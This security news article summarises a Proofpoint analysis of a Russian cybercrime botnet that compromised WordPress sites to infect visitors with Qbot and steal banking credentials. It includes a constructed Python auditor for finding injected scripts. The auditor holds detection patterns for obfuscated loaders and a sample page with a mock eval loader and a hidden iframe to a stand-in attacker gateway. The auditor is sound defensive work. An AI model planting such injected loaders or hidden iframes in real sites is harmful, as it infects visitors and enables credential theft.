Researchers at Proofpoint have released an analysis of a 500,000-strong botnet used by a cybercrime ring to target banking customers in the United States and Europe.
According to Proofpoint, the botnet has stolen online banking credentials for as many as 800,000 accounts, some 59 percent of which were at five of the largest banks in the U.S.
“Based on information gleaned from the attacker’s control panels, such as language preferences and the language of the server names and documentation, as well as from further research, the attackers behind this operation appear to be a Russian cybercrime group whose primary motivation is financial,” according to the report. “While the primary targets appear to be financial accounts and online banking information, the group also has a range of options for further monetization of the infected computers.”
The attackers compromised WordPress sites using purchased lists of administrator logins. They used those logins to upload malware to legitimate sites in order to then infect clients that visited these sites. Many of these sites also run newsletters that the attackers leverage to distribute legitimate – but infected – content.
The compromised sites contain or link to a Traffic Direction System (TDS) filter, which checks to ensure the victim’s browser is a target. If it is, the TDS will merge in content from an exploit server. Otherwise the TDS will be silent.
Next, the attackers exploit a browser or plugin vulnerability and infect the user with the malware dropper Qbot, which generates a unique identifier for each infection and drops additional malware.
More than half of the infected systems are Windows XP machines, while 39 percent run Windows 7.
“When end users browse the web sites compromised by the attackers, the scripts that the attackers added to the compromised site’s page will cause the visiting browsers to ultimately load and run unwanted software in a manner that is completely transparent to the end user,” according to the report.
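The report describes scripts and TDS gateways injected into otherwise legitimate WordPress pages. One defensive check a site owner can run offline is to audit a page's HTML for external script or iframe references that are not on the site's own allowlist, and for inline scripts showing common obfuscation patterns. The following is an added example written for this article, not code from Proofpoint or the report; the sample page, the `example-blog.test` and `tds.attacker.invalid` hostnames and the allowlist are constructed, and the obfuscation heuristics are an assumption, not a signature from the report.

```python
"""Audit WordPress page HTML for injected external resources and obfuscated inline scripts.

Constructed example: parse a page, collect <script src> / <iframe src> references,
flag hosts outside the site's known-good allowlist, and flag inline scripts that
match simple obfuscation heuristics (eval / String.fromCharCode / long escape runs).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic patterns often seen in injected loaders (assumption, not a vendor signature).
OBFUSCATION_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"String\.fromCharCode"),
    re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),   # long runs of hex escapes
    re.compile(r"(%[0-9a-fA-F]{2}){8,}"),     # long runs of URL-encoded bytes
]


class _RefCollector(HTMLParser):
    """Collect external script/iframe sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # list of (tag, src)
        self.inline = []        # list of inline <script> bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe") and a.get("src"):
            self.external.append((tag, a["src"]))
        elif tag == "script":
            # Inline script: start buffering its body.
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_page(html, allowed_hosts):
    """Return a list of (finding_type, detail) for suspicious content in the page.

    allowed_hosts: set of hostnames the site legitimately loads scripts/frames from.
    Same-origin (relative) references have no host and are not flagged.
    """
    parser = _RefCollector()
    parser.feed(html)
    findings = []
    for tag, src in parser.external:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("unexpected_%s_src" % tag, src))
    for body in parser.inline:
        if any(p.search(body) for p in OBFUSCATION_PATTERNS):
            findings.append(("obfuscated_inline_script", body.strip()[:60]))
    return findings


# Constructed sample page: one legitimate CDN script, one obfuscated inline
# loader, and one hidden iframe pointing at a TDS-style gateway.
SAMPLE_PAGE = """<!doctype html><html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.example-blog.test/theme.js"></script>
<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116));</script>
<iframe src="//tds.attacker.invalid/gate.php?ua=1" width="1" height="1"></iframe>
</head><body><p>Newsletter issue 42</p></body></html>"""

# Constructed allowlist of hosts this site is known to load from.
ALLOWED_HOSTS = {"cdn.example-blog.test"}


def run_sample():
    """Audit the constructed sample page with the constructed allowlist."""
    return audit_page(SAMPLE_PAGE, ALLOWED_HOSTS)


if __name__ == "__main__":
    for kind, detail in run_sample():
        print("%-26s %s" % (kind, detail))
```

On a real deployment the allowlist would be built from a clean copy of the theme and plugins, and the audit run against freshly served pages (with several User-Agent values, since a TDS serves its payload only to browsers it targets) so that injected references show up as a diff against the baseline rather than being judged by heuristics alone.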
The cybercrime group used compromised PCs to offer a sophisticated, paid proxying service for other organized crime groups that turns infected PCs into a ‘private cloud’ as well as infiltration points into corporate networks.
“The operations of this Russian cybercrime group exemplify both the sophisticated attack chain and the key challenges of modern threats,” according to the report. “While attackers rely on a variety of means to connect with potential victims, compromised web sites are a critical component in the attack chain. Attackers have the financial and technical means to infect an almost unlimited number of legitimate web sites, above and beyond the more easily identifiable malicious or suspicious sites that traditional defenses are designed to detect and block.”
“Moreover, the attack chain does not simply deliver a single piece of malware onto an infected system and stop at that,” the report continues. “Instead, it is designed to establish a foothold on the system so that any number of different pieces of malicious software can be downloaded in order to carry out criminal activities ranging from banking account theft to secret communications and transfers, to distributed denial of service (DDoS), to ransomware and any other activity that represents an opportunity to monetize that infected system.”
The report can be viewed here.